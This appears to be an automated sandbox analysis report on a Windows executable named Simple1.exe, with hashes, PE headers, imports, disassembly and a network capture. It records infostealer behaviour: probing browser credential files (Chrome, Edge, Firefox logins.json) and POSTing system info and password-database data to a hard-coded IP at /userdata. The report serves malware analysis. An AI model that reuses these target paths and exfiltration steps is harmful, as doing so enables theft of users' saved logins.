            SSDEEP:24:8E5Kk89K5K889KM89LYeb89KDWD89MLFpLK+89r9H+3X6nck:8EUksKU8sKMsLDbsKDWDsgFdK+sF+3Xq
            MD5:FBECB45D903551F94C3A95B7EEBDB7E8
            SHA1:A3BF658F1E13A4DC965362539F393BE4669D92BF
            SHA-256:EDE965AD7144AB6AEEB6B689F76B0810683A438A2C2D78AC3AB865706D802A2C
            SHA-512:3CDA26D47F631860AB26696394330C48B2E58906B9F51C178397FB28743C368E49CDA0CA7FBD2B51458F4A65AC1F990D1B58D7BAF18C5D9CE8329F9D378B54F4
            Malicious:false
            Reputation:low
            Preview:File is found: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\Google\Chrome Beta\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data..File is found: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data..File not found: C:\Users\user\AppData\Roaming\Opera Software\Opera GX Stable\Login Data..File not found: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json..File is found: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\times.json..?? ??????? ???????? ????? ?? ???????...
            File type:PE32+ executable (console) x86-64, for MS Windows
            Entropy (8bit):5.9784256378182175
            TrID:
            • Win64 Executable Console (202006/5) 92.65%
            • Win64 Executable (generic) (12005/4) 5.51%
            • Generic Win/DOS Executable (2004/3) 0.92%
            • DOS Executable Generic (2002/1) 0.92%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:Simple1.exe
            File size:81'920 bytes
            MD5:218954f9dd70247e51af8a30940d5c33
            SHA1:35ee01d3128951c3993079186fddc9c0dbe155f7
            SHA256:95ec35703d323fe972a936d9b3574bb191e94b693656d94149897c5ff35f225f
            SHA512:335108a63a07d9d81240c40e67dc6375468bd5bae79edf413b0ec8913e43364b155fdebe0c972ab6150ae2c59779d75045108d9a257e2ce0b8c5ae78f819804e
            SSDEEP:1536:KRF3gVPu3b3X41IiaqGyB0+Hls+X7nTfRQP7K:yRE23zX41la+THls+m+
            TLSH:A2834947376A00ECD1ABA378D5A30A06D772BC05076193DF13A0A17A0FA67D1AE7FB51
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............a...a...a.......a...b...a...e...a...d...a...`...a...`...a...`.r.a...h...a.......a...c...a.Rich..a........................
            Icon Hash:00928e8e8686b000
            Entrypoint:0x14000bae8
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x140000000
            Subsystem:windows cui
            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Time Stamp:0x6729C700 [Tue Nov 5 07:19:28 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:6
            OS Version Minor:0
            File Version Major:6
            File Version Minor:0
            Subsystem Version Major:6
            Subsystem Version Minor:0
            Import Hash:066fb96ba163200488bf8cbd9705163e
            Instruction
            dec eax
            sub esp, 28h
            call 00007FF3647DBDA0h
            dec eax
            add esp, 28h
            jmp 00007FF3647DB547h
            int3
            int3
            retn 0000h
            int3
            inc eax
            push ebx
            dec eax
            sub esp, 20h
            dec eax
            mov ebx, ecx
            xor ecx, ecx
            call dword ptr [000025CFh]
            dec eax
            mov ecx, ebx
            call dword ptr [000025BEh]
            call dword ptr [000025C8h]
            dec eax
            mov ecx, eax
            mov edx, C0000409h
            dec eax
            add esp, 20h
            pop ebx
            dec eax
            jmp dword ptr [000025BCh]
            dec eax
            mov dword ptr [esp+08h], ecx
            dec eax
            sub esp, 38h
            mov ecx, 00000017h
            call dword ptr [000025B0h]
            test eax, eax
            je 00007FF3647DB6D9h
            mov ecx, 00000002h
            int 29h
            dec eax
            lea ecx, dword ptr [00009D26h]
            call 00007FF3647DB77Eh
            dec eax
            mov eax, dword ptr [esp+38h]
            dec eax
            mov dword ptr [00009E0Dh], eax
            dec eax
            lea eax, dword ptr [esp+38h]
            dec eax
            add eax, 08h
            dec eax
            mov dword ptr [00009D9Dh], eax
            dec eax
            mov eax, dword ptr [00009DF6h]
            dec eax
            mov dword ptr [00009C67h], eax
            dec eax
            mov eax, dword ptr [esp+40h]
            dec eax
            mov dword ptr [00009D6Bh], eax
            mov dword ptr [00009C41h], C0000409h
            mov dword ptr [00009C3Bh], 00000001h
            mov dword ptr [00009C45h], 00000001h
            Programming Language:
            • [IMP] VS2008 SP1 build 30729
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x11ed40x154.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000x1e0.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x160000x9f0.pdata
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000x10c.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0xf7b00x70.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf6700x140.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0xe0000x630.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000xc0770xc200bb167b742e9c1e46cecec9663ad94a6eFalse0.48012644974226804DIY-Thermocam raw data (Lepton 3.x), scale -14592-0, spot sensor temperature -0.000048, unit celsius, color scheme 0, calibration: offset 262144.000000, slope 171778.0468756.1463104557320865IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0xe0000x62400x6400a9c91b7191e54302f31a2135cbaafa16False0.3462109375data4.930625889732141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x150000xda00x800f49b7b400b3a9a593e0463969e69304eFalse0.19775390625DOS executable (block device driver)3.6357853761384584IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .pdata0x160000x9f00xa005859a68e779cdab4bed9be7147961d7cFalse0.493359375data4.82362794619983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .rsrc0x170000x1e00x2002c9bc3c453765c5a8e37ea178e81aa1bFalse0.52734375data4.710061382693063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x180000x10c0x2009549c1cc6ee8d55da6140afe18223169False0.42578125data3.2295190100213778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_MANIFEST0x170600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
            DLLImport
            KERNEL32.dllGetFileAttributesW, GetLocaleInfoA, OpenProcess, GetTimeZoneInformation, GetLastError, CloseHandle, K32GetModuleBaseNameA, GetSystemInfo, K32EnumProcesses, GlobalMemoryStatusEx, GetConsoleWindow, K32EnumProcessModules, GetDiskFreeSpaceExA, FindClose, InitializeSListHead, GetSystemTimeAsFileTime, GetEnvironmentVariableW, FindNextFileW, FindFirstFileW, GetLogicalDrives, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, RtlLookupFunctionEntry, GetModuleFileNameA, GetCurrentThreadId, RtlCaptureContext
            USER32.dllShowWindow
            ADVAPI32.dllRegGetValueA, RegCloseKey, RegOpenKeyExA
            MSVCP140.dll?id@?$codecvt@_WDU_Mbstatet@@@std@@2V0locale@2@A, ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAA_JPEB_W_J@Z, ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z, ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z, ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAPEAD0PEAH001@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z, ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAPEAV12@PEAD_J@Z, ?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAXAEBVlocale@2@@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z, ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z, ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ, ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?good@ios_base@std@@QEBA_NXZ, ??7ios_base@std@@QEBA_NXZ, ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA@XZ, ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z, ?out@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEB_W1AEAPEB_WPEAD3AEAPEAD@Z, ?in@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEA_W3AEAPEA_W@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z, ?_Decref@facet@locale@std@@UEAAPEAV_Facet_base@3@XZ, ?_Incref@facet@locale@std@@UEAAXXZ, ??Bid@locale@std@@QEAA_KXZ, ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A, ?uncaught_exception@std@@YA_NXZ, ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ??0_Lockit@std@@QEAA@H@Z, ??1_Lockit@std@@QEAA@XZ, ?_Xlength_error@std@@YAXPEBD@Z
            IPHLPAPI.DLLGetAdaptersInfo
            NETAPI32.dllNetApiBufferFree, NetUserEnum, NetGetJoinInformation
            WINHTTP.dllWinHttpQueryDataAvailable, WinHttpConnect, WinHttpSendRequest, WinHttpCloseHandle, WinHttpOpenRequest, WinHttpReadData, WinHttpQueryHeaders, WinHttpOpen, WinHttpReceiveResponse
            VCRUNTIME140_1.dll__CxxFrameHandler4
            VCRUNTIME140.dll__C_specific_handler, _CxxThrowException, memset, __current_exception, __std_terminate, __std_exception_copy, memcpy, memcmp, memchr, memmove, __current_exception_context, __std_exception_destroy
            api-ms-win-crt-stdio-l1-1-0.dllfread, fsetpos, ungetc, _fseeki64, _get_stream_buffer_pointers, setvbuf, fgetpos, fwrite, fflush, __p__commode, fputc, fgetc, fclose, _set_fmode
            api-ms-win-crt-heap-l1-1-0.dllfree, malloc, _set_new_mode, _callnewh
            api-ms-win-crt-string-l1-1-0.dllisalnum
            api-ms-win-crt-filesystem-l1-1-0.dll_lock_file, _unlock_file
            api-ms-win-crt-runtime-l1-1-0.dll_get_initial_narrow_environment, _initterm, _initterm_e, _cexit, _exit, __p___argc, __p___argv, _c_exit, _register_thread_local_exe_atexit_callback, _crt_atexit, _register_onexit_function, _seh_filter_exe, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, _set_app_type, exit, terminate, _invalid_parameter_noinfo_noreturn
            api-ms-win-crt-math-l1-1-0.dll__setusermatherr
            api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States
            TimestampSource PortDest PortSource IPDest IP
            Dec 6, 2024 11:46:19.321459055 CET4970480192.168.2.5104.26.13.205
            Dec 6, 2024 11:46:19.441385984 CET8049704104.26.13.205192.168.2.5
            Dec 6, 2024 11:46:19.441590071 CET4970480192.168.2.5104.26.13.205
            Dec 6, 2024 11:46:19.441905975 CET4970480192.168.2.5104.26.13.205
            Dec 6, 2024 11:46:19.561628103 CET8049704104.26.13.205192.168.2.5
            Dec 6, 2024 11:46:20.535684109 CET8049704104.26.13.205192.168.2.5
            Dec 6, 2024 11:46:20.591140985 CET4970480192.168.2.5104.26.13.205
            Dec 6, 2024 11:46:20.871095896 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:20.992064953 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:20.992145061 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:20.992466927 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:20.992543936 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.112689972 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.112752914 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.112756968 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.112811089 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.112905979 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.112916946 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.112961054 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.112967968 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.112979889 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.112979889 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.113034964 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.113322973 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.113368988 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.113375902 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.113413095 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.113420010 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.113461971 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.232254028 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.232408047 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.232434034 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.232486963 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.232523918 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.232534885 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.232580900 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.232748032 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.232758999 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.232769966 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.232800961 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.232842922 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.274440050 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.274727106 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.394476891 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.394633055 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.438404083 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.442333937 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.562419891 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.658436060 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.662331104 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:21.906400919 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:21.908370018 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:22.154671907 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:22.154731989 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:22.406467915 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:22.406536102 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:22.658478975 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:22.658624887 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:22.910904884 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:22.910964012 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:46:23.139931917 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:46:23.539303064 CET4970480192.168.2.5104.26.13.205
            TimestampSource PortDest PortSource IPDest IP
            Dec 6, 2024 11:46:19.168056011 CET6163053192.168.2.51.1.1.1
            Dec 6, 2024 11:46:19.305385113 CET53616301.1.1.1192.168.2.5
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Dec 6, 2024 11:46:19.168056011 CET192.168.2.51.1.1.10x74d3Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Dec 6, 2024 11:46:19.305385113 CET1.1.1.1192.168.2.50x74d3No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
            Dec 6, 2024 11:46:19.305385113 CET1.1.1.1192.168.2.50x74d3No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
            Dec 6, 2024 11:46:19.305385113 CET1.1.1.1192.168.2.50x74d3No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
            • api.ipify.org
            • 185.237.165.97
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.549704104.26.13.205802520C:\Users\user\Desktop\Simple1.exe
            TimestampBytes transferredDirectionData
            Dec 6, 2024 11:46:19.441905975 CET88OUTGET / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: WinHTTP/1.0
            Host: api.ipify.org
            Dec 6, 2024 11:46:20.535684109 CET429INHTTP/1.1 200 OK
            Date: Fri, 06 Dec 2024 10:46:20 GMT
            Content-Type: text/plain
            Content-Length: 12
            Connection: keep-alive
            Vary: Origin
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            CF-RAY: 8edbb1095c7a4346-EWR
            server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1586&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
            Data Ascii: 8.46.123.228


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.549705185.237.165.97802520C:\Users\user\Desktop\Simple1.exe
            TimestampBytes transferredDirectionData
            Dec 6, 2024 11:46:20.992466927 CET185OUTPOST /userdata HTTP/1.1
            Connection: Keep-Alive
            Content-Type: multipart/form-data; boundary=WebKitFormBoundary
            User-Agent: WinHTTP/1.0
            Content-Length: 97217
            Host: 185.237.165.97
            Dec 6, 2024 11:46:20.992543936 CET11124OUTData Raw: 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 79 73 69 6e 66 6f 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65
            Data Ascii: --WebKitFormBoundaryContent-Disposition: form-data; name="sysinfo"Content-Type: application/json{ "sysinfo": "MACHINE%20INFO%3a%0aMachine%20name%3a%20440BX%20Desktop%20Reference%20Platform%0aProcessor%20name%3a%20Intel%28R%29%20Core%28
            Dec 6, 2024 11:46:21.112756968 CET1236OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 11:46:21.112811089 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 11:46:21.112961054 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 11:46:21.112979889 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 11:46:21.113034964 CET4944OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 11:46:21.113375902 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 11:46:21.113413095 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 07 3a 00 03 03 84 00 07 67 07 cf 03 84 07 3a 03 32 02 de 02 34 01 96 01 4d 01 4d 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii: :g:24MM
            Dec 6, 2024 11:46:21.113461971 CET2472OUTData Raw: 74 6f 69 6e 64 65 78 5f 73 74 61 74 73 5f 31 73 74 61 74 73 13 74 0e 07 17 3b 29 01 81 11 69 6e 64 65 78 66 6f 72 65 69 67 6e 5f 6b 65 79 5f 69 6e 64 65 78 5f 6e 6f 74 65 73 70 61 73 73 77 6f 72 64 5f 6e 6f 74 65 73 11 43 52 45 41 54 45 20 49 4e
            Data Ascii: toindex_stats_1statst;)indexforeign_key_index_notespassword_notesCREATE INDEX foreign_key_index_notes ON password_notes (parent_id)K))Qtablepassword_notespassword_notesCREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCR
            Dec 6, 2024 11:46:21.232408047 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:05:46:17
            Start date:06/12/2024
            Path:C:\Users\user\Desktop\Simple1.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\Desktop\Simple1.exe"
            Imagebase:0x7ff7cea90000
            File size:81'920 bytes
            MD5 hash:218954F9DD70247E51AF8A30940D5C33
            Has elevated privileges:true
